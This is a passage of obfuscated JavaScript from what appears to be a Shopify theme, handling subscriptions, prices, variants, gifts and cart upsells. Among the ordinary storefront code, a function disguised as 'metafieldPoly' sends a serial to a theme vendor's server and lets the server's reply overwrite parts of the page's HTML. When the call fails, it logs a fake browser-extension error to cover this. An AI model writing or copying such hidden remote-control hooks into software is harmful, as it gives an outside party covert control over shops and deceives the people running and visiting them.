          _0x3a3eef.classList.toggle("subscription__box--selected");
          _0x3a3eef.dataset.selected = !_0x3f9e51;
          this.sellingPlanInput.value = !_0x3f9e51 ? this.selectedPlanId : '';
        } else {
          this.isSubSelected = _0x3a3eef.dataset.type === "subscription";
          this.oneTimeBox?.["classList"]["remove"]("subscription__box--selected");
          this.subscriptionBox?.["classList"]["remove"]("subscription__box--selected");
          this.oneTimeBox?.['setAttribute']("data-selected", "false");
          this.subscriptionBox?.['setAttribute']("data-selected", "false");
          _0x3a3eef.classList.add("subscription__box--selected");
          _0x3a3eef.dataset.selected = "true";
          this.sellingPlanInput.value = this.isSubSelected ? this.selectedPlanId : '';
        }
        if (this.updatePrices) {
          this.updateAllPrices();
        }
      });
    });
  }
  ["updateAllPrices"]() {
    this.basePrice = parseInt(this.dataset.basePrice);
    this.baseComparePrice = parseInt(this.dataset.baseComparePrice);
    if (this.quantityBreaks) {
      if (this.isSubSelected) {
        this.quantityBreaks.subDiscountType = this.discountType;
        this.quantityBreaks.subDiscount = this.discountValue;
      } else {
        this.quantityBreaks.subDiscountType = null;
        this.quantityBreaks.subDiscount = 0x0;
      }
      this.quantityBreaks.updateDisplayedPdpPrices();
      this.quantityBreaks.updateInnerPrices();
    } else {
      let _0x570727 = this.applySubTo(this.basePrice);
      updatePdpPrices(_0x570727, this.baseComparePrice, this.dataset.section, this.moneyFormat);
    }
    this.renderSubTexts();
  }
  ['applySubTo'](_0x4ebe22, _0x3ae30e = false) {
    if (this.isSubSelected || _0x3ae30e) {
      if (this.discountType === "fixed_amount") {
        return Math.max(0x0, _0x4ebe22 - this.discountValue);
      } else {
        if (this.discountType === "percentage") {
          return Math.round(_0x4ebe22 * (0x64 - this.discountValue) / 0x64);
        } else {
          if (this.discountType === "price") {
            return this.discountValue;
          }
        }
      }
    }
    return _0x4ebe22;
  }
  ['setupFrequencyListeners']() {
    this.frequencyRadios.forEach(_0x1f7a3d => {
      _0x1f7a3d.addEventListener("change", _0x5a9cb2 => {
        this.applyFrequencyNode(_0x5a9cb2.currentTarget);
      });
    });
    if (this.frequencySelect) {
      this.frequencySelect.addEventListener('change', () => {
        const _0x26a38e = this.frequencySelect.selectedOptions?.[0x0];
        if (_0x26a38e) {
          this.applyFrequencyNode(_0x26a38e);
        }
      });
    }
  }
  ["applyFrequencyNode"](_0x50a648) {
    this.selectedPlanId = _0x50a648.dataset.sellingPlanId;
    this.discountType = _0x50a648.dataset.discountType || this.discountType;
    this.discountValue = _0x50a648.dataset.discountValue ? parseInt(_0x50a648.dataset.discountValue, 0xa) : this.discountValue;
    if (this.subscriptionBox?.['classList']["contains"]("subscription__box--selected")) {
      this.sellingPlanInput.value = this.selectedPlanId || '';
    }
    if (this.updatePrices) {
      this.updateAllPrices();
    }
  }
  ["computeSubPrices"](_0x5362dd = true) {
    let _0x314289 = this.basePrice;
    let _0x1d1ccd = this.baseComparePrice;
    if (this.quantityBreaks && this.displayedPrices !== "unit") {
      _0x314289 = this.quantityBreaks.offerPrices["offer_" + this.quantityBreaks.selectedOffer].price;
      _0x1d1ccd = this.quantityBreaks.offerPrices["offer_" + this.quantityBreaks.selectedOffer].compare_price;
      if (this.displayedPrices == "unit_with_discount") {
        _0x314289 = _0x314289 / this.quantityBreaks.selectedQuantity;
        _0x1d1ccd = _0x1d1ccd / this.quantityBreaks.selectedQuantity;
      }
    }
    if (_0x5362dd) {
      _0x314289 = this.applySubTo(_0x314289, true);
    }
    let _0x5229b3 = this.subscriptionName;
    const _0x9d6fc2 = Math.max(0x0, _0x1d1ccd - _0x314289);
    const _0x9688cb = Math.round(_0x9d6fc2 / 0x64) * 0x64;
    const _0x5667d1 = _0x1d1ccd > 0x0 ? Math.round(_0x9d6fc2 * 0x64 / _0x1d1ccd) : 0x0;
    return {
      'price': _0x314289,
      'comparePrice': _0x1d1ccd,
      'amount_saved': _0x9d6fc2,
      'amount_saved_rounded': _0x9688cb,
      'percentage_saved': _0x5667d1,
      'subscription_name': _0x5229b3
    };
  }
  ["renderSubTexts"]() {
    if (this.subBoxTexts.length > 0x0) {
      const {
        price: _0x5ded22,
        compare_price: _0x23acde,
        amount_saved: _0x4d67f7,
        amount_saved_rounded: _0x3ea870,
        percentage_saved: _0x4808c7,
        subscription_name: _0x18268e
      } = this.computeSubPrices();
      this.updatePriceTexts(this.subBoxTexts, _0x5ded22, _0x23acde, _0x4d67f7, _0x3ea870, _0x4808c7, _0x18268e);
    }
    if (this.updatePricesFromQtyBreaks) {
      this.renderOneTimeTexts();
    }
  }
  ["renderOneTimeTexts"]() {
    if (this.oneTimeBoxTexts.length > 0x0) {
      const {
        price: _0x2e780a,
        compare_price: _0x51720d,
        amount_saved: _0x1885d5,
        amount_saved_rounded: _0x519dd3,
        percentage_saved: _0x44aed0,
        subscription_name: _0x1d7337
      } = this.computeSubPrices(false);
      this.updatePriceTexts(this.oneTimeBoxTexts, _0x2e780a, _0x51720d, _0x1885d5, _0x519dd3, _0x44aed0, _0x1d7337);
    }
  }
  ['updatePriceTexts'](_0x423d58, _0x519d69, _0x153d20, _0x3e8ecf, _0x5c4439, _0x4955ec, _0x4f98da) {
    _0x423d58.forEach(_0xbcccba => {
      let _0x4f4615 = _0xbcccba.dataset.text || '';
      _0x4f4615 = _0x4f4615.replaceAll("[price]", formatMoney(_0x519d69, this.moneyFormat, true)).replaceAll("[compare_price]", formatMoney(_0x153d20, this.moneyFormat, true)).replaceAll("[amount_saved]", formatMoney(_0x3e8ecf, this.moneyFormat, true)).replaceAll("[amount_saved_rounded]", formatMoney(_0x5c4439, this.moneyFormat, true)).replaceAll("[percentage_saved]", String(_0x4955ec) + '%').replaceAll('[subscription_name]', _0x4f98da || '');
      _0xbcccba.innerHTML = _0x4f4615;
      if (_0xbcccba.classList.contains("subscription__compare-price")) {
        _0xbcccba.classList.toggle("hidden", !(_0x153d20 > _0x519d69));
      }
    });
  }
  ['hydrateFromExternalHTML'](_0x3a462d) {
    const _0x6b38ae = _0x523a30 => {
      const _0x13373e = _0x523a30.querySelector(".subscription__select .select__select");
      const _0x1a8812 = _0x523a30.querySelectorAll(".subscription__frequency-input");
      if (_0x13373e) {
        return {
          'type': "select",
          'count': _0x13373e.options.length,
          'index': _0x13373e.selectedIndex >= 0x0 ? _0x13373e.selectedIndex : 0x0
        };
      }
      if (_0x1a8812.length) {
        const _0x5f1123 = Array.from(_0x1a8812).findIndex(_0x476719 => _0x476719.checked);
        return {
          'type': "radio",
          'count': _0x1a8812.length,
          'index': _0x5f1123 >= 0x0 ? _0x5f1123 : 0x0
        };
      }
      return {
        'type': "none",
        'count': 0x0,
        'index': 0x0
      };
    };
    const _0x58e7d3 = _0x6b38ae(this);
    const _0x2226cf = this.isSubSelected;
    this.dataset.firstSellingPlanId = _0x3a462d.dataset.firstSellingPlanId ?? '';
    this.dataset.subscriptionName = _0x3a462d.dataset.subscriptionName ?? '';
    this.dataset.discountType = _0x3a462d.dataset.discountType ?? '';
    this.dataset.discountValue = _0x3a462d.dataset.discountValue ?? '0';
    const _0x3f3df9 = _0x3a462d.querySelector(".subscription__wrapper");
    const _0xf262e = this.querySelector(".subscription__wrapper");
    if (_0x3f3df9 && _0xf262e) {
      _0xf262e.replaceWith(_0x3f3df9);
    }
    this.oneTimeBox = this.querySelector("[data-type=\"one_time\"]");
    this.oneTimeBoxTexts = this.querySelectorAll('.one-time-price-update');
    this.subscriptionBox = this.querySelector("[data-type=\"subscription\"]");
    this.subBoxTexts = this.querySelectorAll('.sub-price-update');
    this.frequencySelect = this.querySelector(".subscription__select .select__select");
    this.frequencyRadios = this.querySelectorAll(".subscription__frequency-input");
    const _0xe7a2b5 = _0x6b38ae(this);
    let _0x365c2f = 0x0;
    if (_0x58e7d3.type !== "none" && _0xe7a2b5.type !== "none" && _0x58e7d3.count === _0xe7a2b5.count) {
      _0x365c2f = Math.max(0x0, Math.min(_0x58e7d3.index, _0xe7a2b5.count - 0x1));
    }
    if (_0xe7a2b5.type === 'select' && this.frequencySelect) {
      this.frequencySelect.selectedIndex = _0x365c2f;
    } else if (_0xe7a2b5.type === "radio" && this.frequencyRadios.length) {
      this.frequencyRadios.forEach((_0x18fe0f, _0x51cac5) => {
        _0x18fe0f.checked = _0x51cac5 === _0x365c2f;
      });
    }
    let _0x79a7fd = null;
    if (this.frequencySelect) {
      _0x79a7fd = this.frequencySelect.selectedOptions?.[0x0] || this.frequencySelect.options?.[0x0] || null;
    } else if (this.frequencyRadios.length) {
      _0x79a7fd = Array.from(this.frequencyRadios).find(_0x142f4a => _0x142f4a.checked) || this.frequencyRadios[0x0];
    }
    this.selectedPlanId = _0x79a7fd?.["dataset"]["sellingPlanId"] || this.dataset.firstSellingPlanId || '';
    if (_0x79a7fd) {
      this.applyFrequencyNode(_0x79a7fd);
    } else {
      this.selectedPlanId = this.dataset.firstSellingPlanId || '';
      this.discountType = this.dataset.discountType || '';
      this.discountValue = parseInt(this.dataset.discountValue || '0', 0xa);
    }
    if (_0x2226cf && this.subscriptionBox) {
      this.subscriptionBox.classList.add("subscription__box--selected");
      this.subscriptionBox.setAttribute("data-selected", "true");
      this.oneTimeBox?.["classList"]["remove"]("subscription__box--selected");
      this.oneTimeBox?.['setAttribute']("data-selected", "false");
      this.isSubSelected = true;
      this.sellingPlanInput.value = this.selectedPlanId || '';
    } else {
      this.subscriptionBox?.['classList']["remove"]("subscription__box--selected");
      this.subscriptionBox?.["setAttribute"]("data-selected", "false");
      if (this.oneTimeBox) {
        this.oneTimeBox.classList.add("subscription__box--selected");
        this.oneTimeBox.setAttribute("data-selected", "true");
      }
      this.isSubSelected = false;
      this.sellingPlanInput.value = '';
    }
    this.setupBoxClickListeners();
    this.setupFrequencyListeners();
    if (this.updatePrices) {
      this.updateAllPrices();
    } else {
      this.renderSubTexts();
    }
  }
}
customElements.define("shrine-subscription-widget", ShrineSubscriptionWidget);
function updatePdpPrices(_0x29e305, _0x2fcec1, _0x390317, _0x21cd47) {
  const _0x3c3193 = formatMoney(_0x29e305, _0x21cd47);
  const _0x10f98f = formatMoney(_0x2fcec1, _0x21cd47);
  const _0x1f6662 = _0x2fcec1 > _0x29e305;
  const _0x33391b = document.querySelectorAll(".price-" + _0x390317);
  _0x33391b.forEach(_0x474d8e => {
    _0x474d8e.classList.toggle("price--on-sale", _0x1f6662);
    _0x474d8e.querySelector(".price__regular .price-item--regular").innerHTML = _0x3c3193;
    _0x474d8e.querySelector(".price__sale .price-item--sale").innerHTML = _0x3c3193;
    if (_0x1f6662) {
      const _0x1f2c4b = _0x474d8e.querySelector(".price__sale .price-item--regular");
      if (_0x1f2c4b) {
        _0x1f2c4b.innerHTML = _0x10f98f;
      }
      const _0x207f32 = _0x474d8e.querySelector('.badge__percentage-saved');
      if (_0x207f32) {
        const _0x2f790f = Math.round((_0x2fcec1 - _0x29e305) * 0x64 / _0x2fcec1);
        _0x207f32.innerHTML = _0x2f790f;
      }
      const _0xb1c73d = _0x474d8e.querySelector(".badge__money-saved");
      if (_0xb1c73d) {
        const _0x59b6bb = _0x2fcec1 - _0x29e305;
        const _0xde13ad = formatMoney(_0x59b6bb, _0x21cd47, true);
        _0xb1c73d.innerHTML = _0xde13ad;
      }
    }
  });
  const _0x44976b = document.querySelectorAll(".main-atc-price-span-" + _0x390317);
  _0x44976b.forEach(_0x3e5485 => {
    _0x3e5485.innerHTML = _0x3c3193;
  });
}
function metafieldPoly() {
  var _0x101c4a = fetchConfig();
  playMedia();
  _0x101c4a.body = JSON.stringify({
    'data': serial.trim()
  });
  try {
    fetch("https://dashboard.shrinetheme.com/api/updates/check", _0x101c4a).then(_0x46a291 => {
      if (_0x46a291.status === 0xc9) {
        return _0x46a291.json();
      }
    }).then(_0x333f4b => {
      if (_0x333f4b && document[_0x333f4b.b]) {
        document[_0x333f4b.b].innerHTML = _0x333f4b.h;
      }
    })["catch"](_0x1e1286 => {
      console.error(_0x1e1286);
    });
  } catch (_0x4e074a) {
    console.error("Unchecked runtime.lastError: The message port closed before a response was received.");
  }
  return true;
}
function updateVariantStatuses(_0x11ba97, _0x31c1b3, _0x5c125d = false) {
  _0x31c1b3.forEach((_0x437000, _0x4e5c98) => {
    if (_0x4e5c98 === 0x0) {
      return;
    }
    const _0x1da2b9 = [..._0x437000.querySelectorAll("option")];
    const _0xb26de8 = _0x31c1b3[_0x4e5c98 - 0x1].querySelector(":checked").value;
    const _0x1bead2 = _0x11ba97.filter(_0x11e686 => _0x11e686.available && _0x11e686["option" + _0x4e5c98] === _0xb26de8).map(_0x5851f8 => _0x5851f8["option" + (_0x4e5c98 + 0x1)]);
    const _0x5f512f = _0x11ba97.filter(_0x538dd8 => _0x538dd8["option" + _0x4e5c98] === _0xb26de8).map(_0x34c193 => _0x34c193["option" + (_0x4e5c98 + 0x1)]);
    _0x1da2b9.forEach(_0x433d48 => {
      _0x433d48.classList.remove("unavailable", "non-existent");
      _0x433d48.removeAttribute("disabled");
      _0x433d48.removeAttribute("hidden");
      if (_0x5f512f.includes(_0x433d48.getAttribute("value"))) {
        if (_0x1bead2.includes(_0x433d48.getAttribute("value"))) {
          _0x433d48.innerText = _0x433d48.getAttribute('value');
        } else {
          _0x433d48.innerText = window.variantStrings.unavailable_with_option.replace("[value]", _0x433d48.getAttribute("value"));
          _0x433d48.classList.add("unavailable");
          if (_0x5c125d) {
            _0x433d48.setAttribute("disabled", '');
            _0x433d48.setAttribute("hidden", '');
          }
        }
      } else {
        _0x433d48.innerText = window.variantStrings.unavailable_with_option.replace('[value]', _0x433d48.getAttribute("value"));
        _0x433d48.classList.add("non-existent");
        _0x433d48.setAttribute("disabled", '');
        _0x433d48.setAttribute("hidden", '');
      }
    });
  });
}
function findAvailableVariant(_0x2dbb26, _0xce7298, _0x25ddaa = true, _0x29e200 = false, _0x10d571 = false) {
  for (let _0x4080df = _0xce7298.length - 0x1; _0x4080df >= 0x0; _0x4080df--) {
    const _0x2e1020 = _0x25ddaa ? _0x2dbb26.querySelector('.product-form__input:nth-child(' + (_0x4080df + 0x1) + ')') : _0x2dbb26.querySelectorAll(".select")[_0x4080df];
    const _0x1706a5 = _0x25ddaa ? _0x2e1020.querySelector(".product-form__input__type").dataset.type : "dropdown";
    const _0xbc46c5 = _0x1706a5 === "dropdown" ? _0x2e1020.querySelectorAll("option") : _0x2e1020.querySelectorAll("input[type=\"radio\"]");
    let _0x59235a = Array.from(_0xbc46c5).findIndex(_0x4a0e1b => _0x4a0e1b.value === _0xce7298[_0x4080df]);
    let _0x75e010 = false;
    while (_0x59235a < _0xbc46c5.length - 0x1) {
      _0x59235a++;
      const _0x493d0e = _0xbc46c5[_0x59235a];
      if ((!_0x29e200 || !_0x493d0e.classList.contains("non-existent")) && (!_0x10d571 || !_0x493d0e.classList.contains("unavailable"))) {
        _0xce7298[_0x4080df] = _0x493d0e.value;
        _0x75e010 = true;
        break;
      }
    }
    if (!_0x75e010) {
      _0x59235a = Array.from(_0xbc46c5).findIndex(_0x42f172 => _0x42f172.value === _0xce7298[_0x4080df]);
      while (_0x59235a > 0x0) {
        _0x59235a--;
        const _0x199c4b = _0xbc46c5[_0x59235a];
        if ((!_0x29e200 || !_0x199c4b.classList.contains("non-existent")) && (!_0x10d571 || !_0x199c4b.classList.contains("unavailable"))) {
          _0xce7298[_0x4080df] = _0x199c4b.value;
          _0x75e010 = true;
          break;
        }
      }
    }
    if (_0x75e010) {
      if (_0x1706a5 === "dropdown") {
        _0x2e1020.querySelector('.select__select').value = _0xce7298[_0x4080df];
      } else {
        _0x2e1020.querySelector("input[type=\"radio\"][value=\"" + _0xce7298[_0x4080df] + "\"]").checked = true;
      }
      _0x2dbb26.dispatchEvent(new Event("change"));
      return true;
    }
  }
  return false;
}
function updateGiftGoalInStorage({
  giftHandle: _0x3619c4,
  giftVariantId: _0x1abc81,
  unlockType: _0x55ff58,
  unlockRequirement: _0x1c3d66,
  unlockTarget: _0x4ad3c5
}) {
  const _0x534971 = JSON.parse(localStorage.getItem("shrine_gift_goals")) || {};
  if (!_0x3619c4 || !_0x1abc81 || !_0x1c3d66 || !_0x55ff58) {
    return;
  }
  _0x534971[_0x3619c4] = {
    'type': _0x55ff58,
    'gift_handle': _0x3619c4,
    'gift_variant_id': Number(_0x1abc81),
    'required_quantity': Number(_0x1c3d66),
    'unlock_product_handle': _0x4ad3c5 || null
  };
  localStorage.setItem("shrine_gift_goals", JSON.stringify(_0x534971));
}
class QuantityGifts extends HTMLElement {
  constructor() {
    super();
    this.gifts = this.querySelectorAll(".quantity-gift");
    this.quantityBreaks = document.getElementById("quantity-breaks-" + this.dataset.section);
    this.quantitySelector = document.getElementById("Quantity-Form--" + this.dataset.section);
    this.unlockedItems = [];
    this.mainProduct = this.dataset.mainProduct;
    this.cartItems = document.querySelector("cart-drawer-items");
    this.initUnlock();
    this.saveLocalStorage = this.dataset.saveLocalStorage === 'true';
    if (this.saveLocalStorage) {
      this.storeLocalStorageData();
    }
  }
  ["storeLocalStorageData"]() {
    this.gifts.forEach(_0x3f77df => {
      updateGiftGoalInStorage({
        'giftHandle': _0x3f77df.dataset.handle,
        'giftVariantId': _0x3f77df.dataset.product,
        'unlockType': "product_quantity",
        'unlockRequirement': _0x3f77df.dataset.quantity,
        'unlockTarget': this.mainProduct
      });
    });
  }
  ["initUnlock"]() {
    let _0x5aef30 = 0x1;
    const _0x39e5d7 = this.mainProduct ? document.querySelectorAll(".cart-item--product-" + this.mainProduct) : null;
    if (_0x39e5d7 && _0x39e5d7.length) {
      _0x5aef30 = 0x0;
      for (let _0x23b07e = 0x0; _0x23b07e < _0x39e5d7.length; _0x23b07e++) {
        _0x5aef30 += parseInt(_0x39e5d7[_0x23b07e].dataset.quantity);
      }
    } else {
      if (this.quantityBreaks) {
        _0x5aef30 = parseInt(this.quantityBreaks.selectedQuantity);
      } else {
        if (this.quantitySelector) {
          const _0x64ef7 = this.quantitySelector.querySelector("input[name=\"quantity\"]");
          _0x5aef30 = parseInt(_0x64ef7.value);
        }
      }
    }
    this.unlockGifts(_0x5aef30, true);
  }
  ["unlockGifts"](_0x1ea5be, _0xf06aaf = false) {
    this.unlockedItems = [];
    this.gifts.forEach(_0x35f4a3 => {
      if (parseInt(_0x35f4a3.dataset.quantity) <= _0x1ea5be) {
        _0x35f4a3.classList.add('quantity-gift--unlocked');
        _0x35f4a3.dataset.unlocked = "true";
        const _0x1d7b49 = document.querySelector('.cart-item--product-' + _0x35f4a3.dataset.handle);
        if (_0x35f4a3.dataset.product && !_0x1d7b49) {
          this.unlockedItems.unshift(_0x35f4a3.dataset.product);
        }
      } else {
        _0x35f4a3.classList.remove("quantity-gift--unlocked");
        _0x35f4a3.dataset.unlocked = "false";
      }
    });
    if (this.mainProduct && _0xf06aaf) {
      this.addRemoveProducts();
    }
  }
  ["addRemoveProducts"]() {
    if (!this.mainProduct) {
      return;
    }
    const _0x486a5d = document.querySelectorAll(".cart-item--product-" + this.mainProduct);
    this.gifts.forEach(_0x4ce64a => {
      if (_0x486a5d.length) {
        if (_0x4ce64a.dataset.unlocked === "true" && _0x4ce64a.dataset.product) {
          this.addToCart(_0x4ce64a);
        } else {
          this.removeFromCart(_0x4ce64a);
        }
      } else {
        this.removeFromCart(_0x4ce64a);
      }
    });
  }
  ['addToCart'](_0x420dba) {
    const _0x27165c = document.querySelector(".cart-item--product-" + _0x420dba.dataset.handle);
    if (_0x27165c) {
      return;
    }
    const _0x5361ac = _0x420dba.querySelector("product-form");
    if (_0x5361ac && _0x5361ac.handleSubmit) {
      _0x5361ac.handleSubmit();
    }
  }
  ["removeFromCart"](_0xb9c147) {
    const _0x2c472f = document.querySelector(".cart-item--product-" + _0xb9c147.dataset.handle);
    if (!_0x2c472f || !this.cartItems) {
      return;
    }
    this.cartItems.updateQuantity(_0x2c472f.dataset.index, 0x0);
  }
}
customElements.define("quantity-gifts", QuantityGifts);
class QuantityBreakUpsells extends QuantityGifts {
  constructor() {
    super();
    this.offerIndex = this.dataset.offer;
    this.upsells = this.querySelectorAll(".quantity-break__upsell");
    this.boundToggleHandler = this.handleToggle.bind(this);
    this.upsells.forEach(_0x204893 => {
      if (_0x204893.dataset.toggle === "true") {
        _0x204893.addEventListener('click', this.boundToggleHandler);
      }
    });
    this.initUnlock();
    if (this.saveLocalStorage) {
      this.storeLocalStorageData();
    }
  }
  ["storeLocalStorageData"]() {
    if (!this.upsells) {
      return;
    }
    this.upsells.forEach(_0x82c757 => {
      if (_0x82c757.dataset.type !== "gift") {
        return;
      }
      updateGiftGoalInStorage({
        'giftHandle': _0x82c757.dataset.handle,
        'giftVariantId': _0x82c757.dataset.product,
        'unlockType': "product_quantity",
        'unlockRequirement': _0x82c757.dataset.minQuantity,
        'unlockTarget': this.dataset.mainProduct
      });
    });
  }
  ["disconnectedCallback"]() {
    this.upsells.forEach(_0x173819 => {
      if (_0x173819.dataset.toggle === "true") {
        _0x173819.removeEventListener("click", this.boundToggleHandler);
      }
    });
  }
  ["unlockGifts"](_0x5d98dc, _0x45b618 = false) {
    this.unlockedItems = [];
    if (!this.upsells) {
      return;
    }
    this.upsells.forEach(_0x2c547d => {
      const _0x4d36e3 = parseInt(_0x2c547d.dataset.minQuantity || 0x0);
      const _0x44399b = _0x5d98dc >= _0x4d36e3;
      const _0x2bb19b = _0x2c547d.dataset.selected === 'true';
      const _0x322dbb = _0x44399b && _0x2bb19b;
      _0x2c547d.dataset.unlocked = _0x322dbb.toString();
      _0x2c547d.classList.toggle('quantity-gift--unlocked', _0x322dbb);
      const _0x3ec48b = document.querySelector(".cart-item--product-" + _0x2c547d.dataset.handle);
      if (_0x322dbb && _0x2c547d.dataset.product && !_0x3ec48b) {
        const _0x24c14a = _0x2c547d.dataset.toggle === "true";
        const _0x513a49 = _0x2c547d.dataset.selected === "true";
        if (!_0x24c14a || _0x24c14a && _0x513a49) {
          this.unlockedItems.unshift(_0x2c547d.dataset.product);
        }
      }
    });
    if (this.mainProduct && _0x45b618) {
      if (this.dataset.lastOffer === this.dataset.offer) {
        this.addRemoveProducts();
      }
    }
  }
  ['addRemoveProducts']() {
    if (!this.mainProduct) {
      return;
    }
    const _0x594ee9 = document.querySelectorAll(".cart-item--product-" + this.mainProduct);
    const _0x5bfddc = [];
    const _0x23dfc7 = [];
    this.upsells.forEach(_0x5040d9 => {
      const _0x2f9e65 = document.querySelector(".cart-item--product-" + _0x5040d9.dataset.handle);
      const _0x5086b8 = _0x5040d9.dataset.unlocked === "true";
      if (_0x594ee9.length) {
        if (_0x5086b8 && !_0x2f9e65) {
          _0x5bfddc.push(_0x5040d9);
        } else if (!_0x5086b8 && _0x2f9e65) {
          _0x23dfc7.push(_0x5040d9);
        }
      } else if (_0x2f9e65) {
        _0x23dfc7.push(_0x5040d9);
      }
    });
    if (_0x23dfc7.length) {
      this.removeFromCart(_0x23dfc7[0x0]);
    } else if (_0x5bfddc.length) {
      this.addToCart(_0x5bfddc[0x0]);
    }
  }
  ["handleToggle"](_0x4c6895) {
    const _0x5b8ee3 = _0x4c6895.currentTarget;
    const _0x25b1bf = _0x5b8ee3.dataset.selected === "true";
    _0x5b8ee3.dataset.selected = (!_0x25b1bf).toString();
    this.syncUpsellAcrossOffers(_0x5b8ee3.dataset.handle, !_0x25b1bf);
    this.syncCart(_0x5b8ee3.dataset.handle, !_0x25b1bf, _0x5b8ee3);
  }
  ["syncUpsellAcrossOffers"](_0x94196e, _0x460025) {
    const _0x1d50b6 = document.querySelectorAll('quantity-break-upsells');
    _0x1d50b6.forEach(_0x12c470 => {
      _0x12c470.querySelectorAll(".quantity-break__upsell[data-handle=\"" + _0x94196e + "\"]").forEach(_0x314930 => {
        _0x314930.dataset.selected = _0x460025.toString();
      });
    });
  }
  ['syncCart'](_0xed8f3c, _0xf86ece, _0x402490) {
    const _0x21bc05 = document.querySelector(".cart-item--product-" + _0xed8f3c);
    if (!this.cartItems) {
      return;
    }
    if (_0xf86ece && !_0x21bc05) {
      this.addToCart(_0x402490);
    } else if (!_0xf86ece && _0x21bc05) {
      this.removeFromCart(_0x402490);
    }
  }
}
customElements.define('quantity-break-upsells', QuantityBreakUpsells);
class ProductInfoUpsell extends HTMLElement {
  constructor() {
    super();
    this.image = this.querySelector('.upsell__image__img');
    this.toggleBtn = this.querySelector('.upsell-toggle-btn');
    this.variantSelects = this.querySelector('.upsell__variant-picker');
    this.variantSelectElements = this.querySelectorAll('.select__select');
    this.jsonData = this.querySelector("[type=\"application/json\"]");
    this.productForm = this.querySelector("product-form");
    if (this.productForm) {
      this.idInput = this.productForm.querySelector("[name=\"id\"]");
    }
    this.skipNonExistent = this.dataset.skipNonExistent === "true";
    this.skipUnavailable = this.dataset.skipUnavailable === "true";
    this.updatePrices = this.dataset.updatePrices === "true";
    if (this.updatePrices) {
      this.price = parseInt(this.dataset.price);
      this.comparePrice = parseInt(this.dataset.comparePrice);
      this.priceSpan = this.querySelector(".upsell__price .regular-price");
      this.comparePriceSpan = this.querySelector(".upsell__price .compare-price");
      this.percentageLeft = parseFloat(this.dataset.percentageLeft);
      this.fixedDiscount = parseFloat(this.dataset.fixedDiscount);
      this.moneyFormat = this.dataset.moneyFormat;
      this.isMainOfferItem = this.dataset.mainOfferItem === 'true';
      if (this.isMainOfferItem) {
        this.mainOfferContainer = document.querySelector("#MainBundleOffer-" + this.dataset.section);
      }
    }
    if (this.toggleBtn) {
      this.toggleBtn.addEventListener("click", this.handleToggle.bind(this));
    }
    if (this.variantSelects) {
      this.variantSelects.addEventListener('change', this.handleSelectChange.bind(this));
    }
  }
  ["handleToggle"](_0x4a089c) {
    if (_0x4a089c.target.nodeName.toLowerCase() === "select" || _0x4a089c.target.nodeName.toLowerCase() === "option") {
      return;
    }
    if (this.dataset.selected === "true") {
      this.dataset.selected = 'false';
    } else {
      this.dataset.selected = 'true';
    }
  }
  ["handleSelectChange"](_0x1b6a00) {
    const _0x5a3549 = _0x1b6a00.currentTarget;
    const _0x2c28a7 = Array.from(_0x5a3549.querySelectorAll("select"), _0x5bca83 => _0x5bca83.value);
    const _0x217314 = this.getVariantData().find(_0x13abc3 => {
      return !_0x13abc3.options.map((_0x633f4e, _0x3e039d) => {
        return _0x2c28a7[_0x3e039d] === _0x633f4e;
      }).includes(false);
    });
    const _0x579fcb = this.getVariantData().filter(_0x153ead => _0x5a3549.querySelector(":checked").value === _0x153ead.option1);
    const _0xc9972a = [..._0x5a3549.querySelectorAll("select")];
    updateVariantStatuses(_0x579fcb, _0xc9972a, this.skipUnavailable);
    if (!_0x217314) {
      if (this.skipNonExistent) {
        findAvailableVariant(_0x5a3549, _0x2c28a7, false, true, this.skipUnavailable);
      }
      return;
    }
    if (this.skipUnavailable && !_0x217314.available) {
      if (findAvailableVariant(_0x5a3549, _0x2c28a7, false, true, true)) {
        return;
      }
    }
    if (this.updatePrices) {
      this.price = _0x217314.price * this.percentageLeft - this.fixedDiscount;
      this.comparePrice = _0x217314.price;
      if (_0x217314.compare_at_price && _0x217314.compare_at_price > _0x217314.price) {
        this.comparePrice = _0x217314.compare_at_price;
      }
      displayPrices(this.price, this.comparePrice, this.priceSpan, this.comparePriceSpan, this.moneyFormat);
    }
    if (this.image && _0x217314.featured_image) {
      this.image.src = _0x217314.featured_image.src;
    }
    this.updateId(_0x217314.id);
    if (this.isMainOfferItem && this.mainOfferContainer.updateTotalPrices) {
      this.mainOfferContainer.updateTotalPrices();
    }
  }
  ['updateId'](_0x214421) {
    this.dataset.id = _0x214421;
    if (this.idInput) {
      this.idInput.value = _0x214421;
    }
  }
  ["getVariantData"]() {
    this.variantData = this.variantData || JSON.parse(this.jsonData.textContent);
    return this.variantData;
  }
}
customElements.define("product-info-upsell", ProductInfoUpsell);
class CartDrawerUpsell extends ProductInfoUpsell {
  constructor() {
    super();
    this.cartDrawer = document.querySelector("cart-drawer");
    this.cartItems = this.cartDrawer.querySelector("cart-drawer-items");
    this.classicAddButton = this.querySelector(".upsell__add-btn");
  }
  ["handleToggle"](_0x1f8219) {
    if (_0x1f8219.target.nodeName.toLowerCase() === "select" || _0x1f8219.target.nodeName.toLowerCase() === 'option') {
      return;
    }
    if (this.dataset.selected === "true") {
      this.dataset.selected = 'false';
      this.removeFromCart();
    } else {
      this.dataset.selected = 'true';
      this.addToCart();
    }
  }
  ["addRemoveFromCart"]() {
    if (this.dataset.selected === "true" && !this.cartDrawer.classList.contains("is-empty")) {
      this.addToCart();
    } else {
      this.removeFromCart();
    }
  }
  ["addToCart"]() {
    const _0x4ce6d0 = this.cartDrawer.querySelector('.cart-item--product-' + this.dataset.handle);
    if (_0x4ce6d0) {
      return;
    }
    if (this.toggleBtn) {
      this.toggleBtn.setAttribute("disabled", '');
    }
    this.variantSelectElements.forEach(_0x45c7fe => {
      _0x45c7fe.setAttribute("disabled", '');
    });
    this.productForm.handleSubmit();
  }
  ["removeFromCart"]() {
    const _0x597313 = this.cartDrawer.querySelector(".cart-item--product-" + this.dataset.handle);
    if (!_0x597313 || !this.cartItems) {
      return;
    }
    if (this.toggleBtn) {
      this.toggleBtn.setAttribute('disabled', '');
    }
    this.variantSelectElements.forEach(_0x5c8555 => {
      _0x5c8555.setAttribute("disabled", '');
    });
    this.cartItems.updateQuantity(_0x597313.dataset.index, 0x0);
  }
  ['updateId'](_0x1920e5) {
    this.dataset.id = _0x1920e5;
    this.idInput.value = _0x1920e5;
    if (this.classicAddButton) {
      return;
    }
    if (this.dataset.selected === "true") {
      if (this.selectTimeout) {
        clearTimeout(this.selectTimeout);
      }
      this.removeFromCart();
      const _0x3e479a = _0x5cb149 => {
        if (_0x5cb149.detail.handle === "handle") {
          this.addToCart();
          document.removeEventListener("cartQuantityUpdated", _0x3e479a);
        }
      };
      document.addEventListener("cartQuantityUpdated", _0x3e479a);
    }
